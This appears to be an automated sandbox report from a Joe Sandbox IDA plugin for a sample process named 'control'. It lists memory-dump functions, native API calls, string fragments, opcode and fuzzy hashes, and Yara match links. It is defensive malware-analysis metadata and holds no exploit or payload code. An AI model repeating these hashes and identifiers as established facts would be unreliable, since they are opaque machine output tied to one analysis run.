Instruction ID: 5151805209b16e533df4c0ceac219beac94d579e253578298675a8f214191f7c
Opcode Fuzzy Hash: 05f8cbe9a67053faebbdd48497d385cf30aaceaf448df965e6d79a527728fe2c
Instruction Fuzzy Hash: 34F06DB6215208AFCB48DF89DC85EEB77ADAF8C754F158248BA0D97241D630F8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0061A30C Relevance: 1.5, APIs: 1, Instructions: 39filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000005,00000000,00615807,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,00615807,00000000,00000005,00000060,00000000,00000000), ref: 0061A35D

Memory Dump Source

Source File: 00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_600000_control.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 26cc0af812b80910615310fe8a3bcbac781297100e4536bc9a0f74e9c5d6880a
Instruction ID: a00d478bc1ef6fa414fbffb0bf3440acd7779fc42d8ea7900019b4d57149a176
Opcode Fuzzy Hash: 26cc0af812b80910615310fe8a3bcbac781297100e4536bc9a0f74e9c5d6880a
Instruction Fuzzy Hash: BFF0E7B2214149AFCB08CF98DD85CEB77A9EF8C754B15864CFA1D93202D630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0061A3C0 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(006159C2,5DA515B3,FFFFFFFF,00615681,00000206,?,006159C2,00000206,00615681,FFFFFFFF,5DA515B3,006159C2,00000206,00000000), ref: 0061A405

Memory Dump Source

Source File: 00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_600000_control.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: e5d7400b7f88f9e847cc14e0a9f05318c07280550caa848c8aac871fd6d54ef7
Instruction ID: da67a07fd074ad2c66edc4b0abc8aa6ae859f4ad90fdee10594f075b93dd836a
Opcode Fuzzy Hash: e5d7400b7f88f9e847cc14e0a9f05318c07280550caa848c8aac871fd6d54ef7
Instruction Fuzzy Hash: 7BF0B7B2200208AFCB14DF99DC85EEB77ADEF8C754F158248BE0D97241D630E811CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0061A440 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(006159A0,00000206,?,006159A0,00000005,FFFFFFFF), ref: 0061A465

Memory Dump Source

Source File: 00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_600000_control.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 0426a9d0be4b64f185d3b9c384294d9413b6a4dfa4ea7960749df6bb8e7742f2
Instruction ID: 9d4f6a65f75f4d3de0e62a57e48c0866d7593f45ba32f212bc18b97805f0cdeb
Opcode Fuzzy Hash: 0426a9d0be4b64f185d3b9c384294d9413b6a4dfa4ea7960749df6bb8e7742f2
Instruction Fuzzy Hash: 40D01772200218ABD620EB98DC89ED77BADDF48A60F118055BA4C5B242C530FA0086E1

Uniqueness

Uniqueness Score: -1.00%

Function 04629540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0462954A

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3912e122e9ca5cf26189c92015915281ab78c4f3d3923ce1c23138c005263923
Instruction ID: 59c0ab611d385d335f342a588196d362395d878abf7e5b7a9b55f5c2114bda3e
Opcode Fuzzy Hash: 3912e122e9ca5cf26189c92015915281ab78c4f3d3923ce1c23138c005263923
Instruction Fuzzy Hash: 9F9002A5221040032105A9590705507004A97D5797751D021F1006550CE661D8716161

Uniqueness

Uniqueness Score: -1.00%

Function 046295D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 046295DA

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6248f3a8b37d6593f106a8cbf26606c007128fd92025a425bc2ddf82c168ce73
Instruction ID: 65da4e856814bc4a28da92f95a934343d3bafaf1592cf85a02204c830259d1a0
Opcode Fuzzy Hash: 6248f3a8b37d6593f106a8cbf26606c007128fd92025a425bc2ddf82c168ce73
Instruction Fuzzy Hash: 679002E121204003610575594415616400E97E0647F51D021E1005590DD565D8A17165

Uniqueness

Uniqueness Score: -1.00%

Function 04629660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0462966A

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d8bac6d08056b527cde5206e23a4f45a2b5d9b83fec3a62d27254733b0034c56
Instruction ID: 2a1f9e91595a2d6a67ea8bcf527c4707fd96584fd538122c2f2857fdb3a8e249
Opcode Fuzzy Hash: d8bac6d08056b527cde5206e23a4f45a2b5d9b83fec3a62d27254733b0034c56
Instruction Fuzzy Hash: 7A9002B121104802F1807559440564A000997D1747F91D015A0016654DDA55DA6977E1

Uniqueness

Uniqueness Score: -1.00%

Function 04629650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0462965A

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0231c2e7f2914564ce58c4658956c0a9609e0b78faee0e7e18bcaf924c6bfe6f
Instruction ID: 852210fb4198b4ef375d21b2748f76f2653b4e79503bccac501f32de7916b976
Opcode Fuzzy Hash: 0231c2e7f2914564ce58c4658956c0a9609e0b78faee0e7e18bcaf924c6bfe6f
Instruction Fuzzy Hash: 019002B121508842F14075594405A46001997D074BF51D011A0055694DA665DD65B6A1

Uniqueness

Uniqueness Score: -1.00%

Function 04629610 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0462961A

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 98f569c7af33e9d9fb5b5628b898eda370c4961a1c168ddbc25a11776a732c15
Instruction ID: 13c4e08c13403a2149858b2e4558c4c09b832b97ec96a22bc1646648aaaa254e
Opcode Fuzzy Hash: 98f569c7af33e9d9fb5b5628b898eda370c4961a1c168ddbc25a11776a732c15
Instruction Fuzzy Hash: BE9002B161504802F15075594415746000997D0747F51D011A0015654D9795DA6576E1

Uniqueness

Uniqueness Score: -1.00%

Function 046296E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 046296EA

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a784817fe451f91f5d749efa9e9f4ee830feb215c12c3547e17643709b2e5820
Instruction ID: 37339e01bd96f14cf1ece8d5f5dcb7f31f18a19901c923379d9e16847cab6de6
Opcode Fuzzy Hash: a784817fe451f91f5d749efa9e9f4ee830feb215c12c3547e17643709b2e5820
Instruction Fuzzy Hash: 459002B12110C802F1106559840574A000997D0747F55D411A4415658D96D5D8A17161

Uniqueness

Uniqueness Score: -1.00%

Function 046296D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 046296DA

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 218e7ceae94ad7f93c952495f62b3d7ea52ceaa3bbc69cc77ae86d666f183582
Instruction ID: 5cafa21be8155f903edf76c12118fb577bacaf20b493d0a713195d34b86764b7
Opcode Fuzzy Hash: 218e7ceae94ad7f93c952495f62b3d7ea52ceaa3bbc69cc77ae86d666f183582
Instruction Fuzzy Hash: 019002B121104842F10065594405B46000997E0747F51D016A0115654D9655D8617561

Uniqueness

Uniqueness Score: -1.00%

Function 04629710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0462971A

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 79cfdacde6bec1fe05c08021af708b27dce2ba3952419c6146a55fb6eb7fa8a9
Instruction ID: 55791d489d55beab4b59f7e097f0b378b7eed7b719c92b254d5713eb991e58af
Opcode Fuzzy Hash: 79cfdacde6bec1fe05c08021af708b27dce2ba3952419c6146a55fb6eb7fa8a9
Instruction Fuzzy Hash: 139002B121104402F10069995409646000997E0747F51E011A5015555ED6A5D8A17171

Uniqueness

Uniqueness Score: -1.00%

Function 04629FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04629FEA

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 57757f1773d55c46126977e8a754a18d3ac10f8d82005936df6a37465e45adf8
Instruction ID: f0325f22ac9860d5960db4aa391410d101146be8f29e0857cff0efe65ecff1ed
Opcode Fuzzy Hash: 57757f1773d55c46126977e8a754a18d3ac10f8d82005936df6a37465e45adf8
Instruction Fuzzy Hash: 389002B132118402F11065598405706000997D1647F51D411A0815558D96D5D8A17162

Uniqueness

Uniqueness Score: -1.00%

Function 04629780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0462978A

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d4720905802f302d3dade558922ee68c2156ac22aa678b77b95d4e7be91e5c54
Instruction ID: cf6653ff5640415808d048635662a8643011f9cb8343b2772910c7bc23c5d150
Opcode Fuzzy Hash: d4720905802f302d3dade558922ee68c2156ac22aa678b77b95d4e7be91e5c54
Instruction Fuzzy Hash: FD9002A922304002F1807559540960A000997D1647F91E415A0006558CD955D8796361

Uniqueness

Uniqueness Score: -1.00%

Function 04629860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0462986A

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 828354f830257b343dd96f14ff15578c8506c6722b9368fe6d92f1367079d336
Instruction ID: 4c36bacefce5ac28f985447ac7c45ad112a257c28a863fe481c1cafdaf86f291
Opcode Fuzzy Hash: 828354f830257b343dd96f14ff15578c8506c6722b9368fe6d92f1367079d336
Instruction Fuzzy Hash: 709002B121104413F11165594505707000D97D0687F91D412A0415558DA696D962B161

Uniqueness

Uniqueness Score: -1.00%

Function 04629840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0462984A

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1a3d0e1d0a3e162e8a01e91249e21fe8db57ba38ecfaad1ebce2cca3c9178bcc
Instruction ID: 4956ab1b5c8cdc4efc1869a3b7a95897f9e717bd0d404ce847cc88ad5978d1a3
Opcode Fuzzy Hash: 1a3d0e1d0a3e162e8a01e91249e21fe8db57ba38ecfaad1ebce2cca3c9178bcc
Instruction Fuzzy Hash: EC9002A1252081527545B5594405507400AA7E0687B91D012A1405950C9566E866E661

Uniqueness

Uniqueness Score: -1.00%

Function 04629910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0462991A

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ef6a29a16e4c5417740650199ac7e22820996cd67042379fec475b6273c9473d
Instruction ID: 04a8b589be77d55808fb1cb49ec31c097b400c88dbcdddae7808b6678e2d1a8c
Opcode Fuzzy Hash: ef6a29a16e4c5417740650199ac7e22820996cd67042379fec475b6273c9473d
Instruction Fuzzy Hash: F49002F121104402F14075594405746000997D0747F51D011A5055554E9699DDE576A5

Uniqueness

Uniqueness Score: -1.00%

Function 046299A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 046299AA

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1c5ac0aa4c1bde2bafd15c407933c64f4a887f59043dcd09532901377f2861f8
Instruction ID: 3aafd3b176b985608d92c7cc22fb8be50ca40e4efb81cd14ddfb1250c2c762ed
Opcode Fuzzy Hash: 1c5ac0aa4c1bde2bafd15c407933c64f4a887f59043dcd09532901377f2861f8
Instruction Fuzzy Hash: EB9002E135104442F10065594415B060009D7E1747F51D015E1055554D9659DC627166

Uniqueness

Uniqueness Score: -1.00%

Function 04629A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04629A5A

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 98ec47ef56f374a8608a505e9312acd17ab3b251477c07bc768ecb4508ea4929
Instruction ID: 1b48262c0c24d3898e90e1ace0224c53f261669c176e49cb31037f9367fba854
Opcode Fuzzy Hash: 98ec47ef56f374a8608a505e9312acd17ab3b251477c07bc768ecb4508ea4929
Instruction Fuzzy Hash: FF9002A122184042F20069694C15B07000997D0747F51D115A0145554CD955D8716561

Uniqueness

Uniqueness Score: -1.00%

Function 0060ECAD Relevance: 26.6, APIs: 1, Strings: 14, Instructions: 314
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesW.KERNELBASE(?), ref: 0060EE62

Strings

a, xrefs: 0060EDA3
o, xrefs: 0060ED8B
\, xrefs: 0060ECFE
e, xrefs: 0060ED08
n, xrefs: 0060EDD4
l, xrefs: 0060ED1C
\, xrefs: 0060ED81
a, xrefs: 0060EDAA
s, xrefs: 0060EDC6
i, xrefs: 0060ED95
\, xrefs: 0060EDB1
a, xrefs: 0060ED12
, xrefs: 0060ED9C
a, xrefs: 0060EDB8

Memory Dump Source

Source File: 00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_600000_control.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID: $\$\$\$a$a$a$a$e$i$l$n$o$s
API String ID: 3188754299-3737123131
Opcode ID: fd8c9892d03598b6543508e7c361a1b9e1cb86797db5f9e66ad40b5d5158b670
Instruction ID: 9221412830e1aa83d5e4f388c074978cca25086a35e45c88f07393996a866d25
Opcode Fuzzy Hash: fd8c9892d03598b6543508e7c361a1b9e1cb86797db5f9e66ad40b5d5158b670
Instruction Fuzzy Hash: 9AC181B5900308AFEB54DFA0CC85FEEB7B9BF48700F04855DE519AB241EB71AA84CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0060ECB0 Relevance: 26.6, APIs: 1, Strings: 14, Instructions: 312
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesW.KERNELBASE(?), ref: 0060EE62

Strings

a, xrefs: 0060EDA3
o, xrefs: 0060ED8B
\, xrefs: 0060ECFE
e, xrefs: 0060ED08
n, xrefs: 0060EDD4
l, xrefs: 0060ED1C
\, xrefs: 0060ED81
a, xrefs: 0060EDAA
s, xrefs: 0060EDC6
i, xrefs: 0060ED95
\, xrefs: 0060EDB1
a, xrefs: 0060ED12
, xrefs: 0060ED9C
a, xrefs: 0060EDB8

Memory Dump Source

Source File: 00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_600000_control.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID: $\$\$\$a$a$a$a$e$i$l$n$o$s
API String ID: 3188754299-3737123131
Opcode ID: 885f0f7e999d8d2a5080b07b2819514fc500e7093d8f00c8b76dad30f764077a
Instruction ID: 20e984b3b1921db7ba0a6e9e7ac015358508f5cf9a53277988d281d784cabc8d
Opcode Fuzzy Hash: 885f0f7e999d8d2a5080b07b2819514fc500e7093d8f00c8b76dad30f764077a
Instruction Fuzzy Hash: DAC170B5900308AFDB54DFA4CC85FEEB7B9BF48700F04855DE519AB281EB70AA84CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00619030 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 006190D8

Strings

wininet.dll, xrefs: 0061908E, 00619097
net.dll, xrefs: 006190A1, 00619127, 006190FF, 0061910B, 00619133

Memory Dump Source

Source File: 00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_600000_control.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 4d2a007d504bc8e6b0356848ef07aafb401f94bd1fbd77e3bb37da0f503565c8
Instruction ID: 54a3e5f59d2658b8270335e5652a557514e3ed2ae078b808dc36b28945db2230
Opcode Fuzzy Hash: 4d2a007d504bc8e6b0356848ef07aafb401f94bd1fbd77e3bb37da0f503565c8
Instruction Fuzzy Hash: 9131ACB2502705ABD721DF64C8A1FE7B7B9AF88700F14811DF61A9B241D770A885CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00619029 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 006190D8

Strings

wininet.dll, xrefs: 0061908E, 00619097
net.dll, xrefs: 006190A1, 006190FF, 0061910B

Memory Dump Source

Source File: 00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_600000_control.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 0d15f458ba5ee20c92e1ba8e54e470bb3adea2172ec7a0389ada0f4765e530d3
Instruction ID: 9f80b32100a834d9a7ba5f826e3ca9e0d7129328765feff3dd60adab86d72743
Opcode Fuzzy Hash: 0d15f458ba5ee20c92e1ba8e54e470bb3adea2172ec7a0389ada0f4765e530d3
Instruction Fuzzy Hash: 2121BDB2901305BBD720DF64C8A6FA7B7B9AF88700F14811DF6195B241D370A485CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 006133C0 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000,00000000,00603D06,00000000), ref: 006133D7

Strings

@J7<, xrefs: 006133EB

Memory Dump Source

Source File: 00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_600000_control.jbxd

Yara matches

Similarity

API ID: Initialize
String ID: @J7<
API String ID: 2538663250-2016760708
Opcode ID: 6e376ea1f540e8a0a42b167356ecca8cf501c20a66b8078c60493710527b8f9a
Instruction ID: 0ac452b613ab0a947bfc5cecc0ea3171e8fdfd410a7ae9e5e326358514fd91a9
Opcode Fuzzy Hash: 6e376ea1f540e8a0a42b167356ecca8cf501c20a66b8078c60493710527b8f9a
Instruction Fuzzy Hash: EA3121B5A006199FDB00DFD8C8809EEB7BABF88304B148559E516EB314D775EE458BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00607643 Relevance: 3.1, APIs: 2, Instructions: 60threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0000000D,00000111,00000000,00000000,?), ref: 006076DA
PostThreadMessageW.USER32(0000000D,00008003,00000000,?,00000000), ref: 006076FB

Memory Dump Source

Source File: 00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_600000_control.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 6239f8611290fea28abedac3a940efaa6dae11285b51c727491ec0d95a60b881
Instruction ID: a772bc13e5c42ccb1ce2b5a75bda0dc8cd86e6a8d2a9f64a4bff06ba4b942a2e
Opcode Fuzzy Hash: 6239f8611290fea28abedac3a940efaa6dae11285b51c727491ec0d95a60b881
Instruction Fuzzy Hash: DF11AB31E9466937D7319A389C42FEEB7495B42750F08419DFA40AB2C2E682690682E2

Uniqueness

Uniqueness Score: -1.00%

Function 00607680 Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0000000D,00000111,00000000,00000000,?), ref: 006076DA
PostThreadMessageW.USER32(0000000D,00008003,00000000,?,00000000), ref: 006076FB

Memory Dump Source

Source File: 00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_600000_control.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: d502e351be01321d4d1b4f6cd4fe7abab6dc2930b0ce7d83eaa82efc98e08a62
Instruction ID: 726c82dd0711948d98ecc15641b9a8d0bd9fb0c2bb37c0b4d8eff7b0129cd646
Opcode Fuzzy Hash: d502e351be01321d4d1b4f6cd4fe7abab6dc2930b0ce7d83eaa82efc98e08a62
Instruction Fuzzy Hash: 7001DF31AC02287BE724A6948C43FFF772D9B45B50F080118FF04BA2C1EA95790646EA

Uniqueness

Uniqueness Score: -1.00%

Function 0060A140 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0060A1B2

Memory Dump Source

Source File: 00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_600000_control.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: c06de1ea13a8af031dc4c62c0dda777427f6ee9b41022bae029d2c9e7cdc61ad
Instruction ID: ad77e3dab28e1f2c55d4553903b93f14f01f0cee1640c0e8b01ca07212fb28bf
Opcode Fuzzy Hash: c06de1ea13a8af031dc4c62c0dda777427f6ee9b41022bae029d2c9e7cdc61ad
Instruction Fuzzy Hash: 4D014CB5E4020DABDB10DAE0EC42FDEB7B99B54348F0441A8A90897281F630EB448B91

Uniqueness

Uniqueness Score: -1.00%

Function 0061A690 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

